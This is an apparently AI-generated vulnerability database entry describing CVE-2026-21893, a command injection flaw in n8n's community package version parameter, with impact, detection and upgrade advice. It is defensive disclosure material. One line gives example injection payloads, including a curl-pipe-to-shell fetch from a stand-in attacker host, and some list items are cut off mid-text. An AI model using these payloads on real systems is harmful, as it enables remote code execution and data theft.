
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-21893 is a command injection vulnerability in n8n's community package installation functionality, classified under CWE-78 (OS Command Injection) and CWE-20 (Improper Input Validation). It affects n8n versions 0.187.0 through 1.120.2 (the npm package for Node.js) and was disclosed on February 4, 2026, via a GitHub Security Advisory. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) and a CVSS v4.0 base score of 9.4 (Critical) (Github Advisory, n8n Advisory).
The root cause is insufficient validation of the package version string supplied during community node installation. The parseNpmPackageName function and the install/update controller endpoints in community-packages.service.ts and community-packages.controller.ts did not validate the version parameter against a semver format before incorporating it into npm shell commands, enabling OS command injection via specially crafted version strings (e.g., 0.1.29#;ls) (n8n Commit). The fix adds a semver.valid() check that rejects any version string that does not conform to valid semver syntax, throwing a BadRequestError or UnexpectedError before the value reaches the shell (n8n Commit). Exploitation requires authenticated administrative access to the n8n instance; no unauthenticated or low-privilege attack path exists (Github Advisory).
Successful exploitation allows an authenticated administrator to execute arbitrary OS commands on the n8n host with the privileges of the n8n process, resulting in high impact to confidentiality, integrity, and availability of the system. An attacker could exfiltrate sensitive workflow data, credentials stored in n8n, or environment variables; modify or delete data; or disrupt service availability. Because n8n often integrates with external services and APIs, a compromised host could also serve as a pivot point for lateral movement into connected systems (Github Advisory, n8n Advisory).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the disclosure date (Github Advisory). The EPSS score is approximately 0.47% (49th percentile), indicating a relatively low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained to users with administrative credentials, significantly limiting the attacker pool. The vulnerability was reported by researcher berkdedekarginoglu (n8n Advisory).
/api/v1/community-packages endpoint).0.1.29#;id or 0.1.29;curl attacker.com/shell.sh|sh, which bypasses the (pre-patch) lack of semver validation./api/v1/community-packages with version parameters containing shell metacharacters (e.g., ;, |, #, &, $(, `); npm execution logs with anomalous command arguments./bin/sh, curl, wget, bash, python) visible in process trees; unexpected cron jobs or scheduled tasks created under the n8n service account.Users should upgrade n8n to version 1.120.3 or later, which adds semver validation to the package version parameter in both the install and update endpoints, fully resolving the vulnerability (Github Advisory, n8n Commit). As interim mitigations, restrict administrative access to the n8n instance to only fully trusted users, disable community package installation if not required, and limit network access to the n8n admin interface. Ensure n8n instances are not exposed to the public internet without strong authentication controls.
Coverage of CVE-2026-21893 appeared alongside reporting on a broader set of n8n vulnerabilities disclosed around the same time, with CSO Online noting "six more vulnerabilities found in n8n automation platform" (CSO Online). BeyondMachines reported on n8n patching "critical command injection and sandbox escape flaws" in the same release cycle (BeyondMachines). The n8n maintainers characterized the severity as "Low" in their own advisory despite the high CVSS scores, emphasizing that the vulnerability does not meaningfully expand the threat model for administrative users (n8n Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."